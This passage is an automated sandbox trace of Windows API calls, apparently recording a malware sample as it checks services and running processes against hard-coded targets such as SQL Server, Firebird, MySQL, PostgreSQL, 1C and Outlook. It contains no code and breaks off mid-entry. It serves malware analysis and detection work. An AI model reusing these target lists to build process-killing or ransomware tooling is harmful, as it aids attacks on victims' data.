lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.926] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.926] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.926] lstrlenW (lpString="Spooler") returned 7 [0054.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.926] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.926] lstrlenW (lpString="swprv") returned 5 [0054.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0054.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0054.926] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0054.926] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0054.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0054.926] lstrlenW (lpString="SysMain") returned 7 [0054.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.926] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.926] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.926] lstrlenW (lpString="Themes") returned 6 [0054.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0054.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0054.927] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0054.927] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0054.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0054.927] lstrlenW (lpString="TrkWks") returned 6 [0054.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0054.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0054.927] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0054.927] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0054.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0054.927] lstrlenW (lpString="UxSms") returned 5 [0054.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0054.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0054.927] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0054.927] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0054.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0054.927] lstrlenW (lpString="VSS") returned 3 [0054.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0054.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0054.927] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0054.927] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0054.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0054.927] lstrlenW (lpString="WdiServiceHost") returned 14 [0054.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.927] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0054.927] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0054.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0054.927] lstrlenW (lpString="WdiSystemHost") returned 13 [0054.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.927] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0054.927] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0054.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0054.928] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0054.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.928] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0054.928] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0054.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0054.928] lstrlenW (lpString="Winmgmt") returned 7 [0054.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0054.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0054.928] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0054.928] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0054.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0054.928] lstrlenW (lpString="WPDBusEnum") returned 10 [0054.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.928] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0054.928] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0054.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0054.928] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0054.928] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0054.933] Process32FirstW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.934] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.935] lstrlenW (lpString="System") returned 6 [0054.935] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0054.935] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0054.935] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0054.935] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0054.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0054.935] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0054.935] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0054.935] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.935] lstrlenW (lpString="smss.exe") returned 8 [0054.936] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0054.936] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.936] lstrlenW (lpString="csrss.exe") returned 9 [0054.936] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0054.936] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0054.936] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0054.937] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0054.937] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0054.937] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0054.937] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.937] lstrlenW (lpString="wininit.exe") returned 11 [0054.937] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0054.937] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0054.937] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0054.937] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.938] lstrlenW (lpString="csrss.exe") returned 9 [0054.938] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.939] lstrlenW (lpString="winlogon.exe") returned 12 [0054.939] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.940] lstrlenW (lpString="services.exe") returned 12 [0054.940] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.940] lstrlenW (lpString="lsass.exe") returned 9 [0054.940] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.941] lstrlenW (lpString="lsm.exe") returned 7 [0054.941] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.942] lstrlenW (lpString="svchost.exe") returned 11 [0054.942] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.943] lstrlenW (lpString="svchost.exe") returned 11 [0054.943] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.943] lstrlenW (lpString="svchost.exe") returned 11 [0054.943] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.944] lstrlenW (lpString="svchost.exe") returned 11 [0054.944] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.945] lstrlenW (lpString="svchost.exe") returned 11 [0054.945] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.945] lstrlenW (lpString="audiodg.exe") returned 11 [0054.946] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.946] lstrlenW (lpString="svchost.exe") returned 11 [0054.946] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.947] lstrlenW (lpString="svchost.exe") returned 11 [0054.947] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.948] lstrlenW (lpString="dwm.exe") returned 7 [0054.948] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.948] lstrlenW (lpString="explorer.exe") returned 12 [0054.948] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.949] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.949] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.950] lstrlenW (lpString="taskhost.exe") returned 12 [0054.950] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.950] lstrlenW (lpString="svchost.exe") returned 11 [0054.951] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0054.951] lstrlenW (lpString="taskeng.exe") returned 11 [0054.951] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.952] lstrlenW (lpString="taskhost.exe") returned 12 [0054.952] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0054.953] lstrlenW (lpString="entrepreneur.exe") returned 16 [0054.953] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0054.953] lstrlenW (lpString="andrew kinds.exe") returned 16 [0054.953] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0054.954] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0054.954] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0054.955] lstrlenW (lpString="educated.exe") returned 12 [0054.955] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0054.955] lstrlenW (lpString="servers.exe") returned 11 [0054.955] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0054.956] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0054.956] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0054.957] lstrlenW (lpString="gbp_chair.exe") returned 13 [0054.957] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0054.957] lstrlenW (lpString="attention infected.exe") returned 22 [0054.958] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0055.016] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0055.021] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0055.022] lstrlenW (lpString="pattern amateur.exe") returned 19 [0055.022] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0055.023] lstrlenW (lpString="referral.exe") returned 12 [0055.023] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0055.023] lstrlenW (lpString="copyingseems.exe") returned 16 [0055.023] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0055.024] lstrlenW (lpString="spin generally.exe") returned 18 [0055.024] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0055.025] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0055.025] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0055.025] lstrlenW (lpString="transmit.exe") returned 12 [0055.026] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0055.026] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0055.026] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0055.027] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0055.027] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0055.028] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0055.028] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0055.028] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0055.028] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0055.029] lstrlenW (lpString="delight.exe") returned 11 [0055.029] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0055.030] lstrlenW (lpString="within enquiry.exe") returned 18 [0055.030] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.031] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0055.031] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0055.031] lstrlenW (lpString="agent1c.exe") returned 11 [0055.031] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0055.032] lstrlenW (lpString="cmd.exe") returned 7 [0055.032] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, 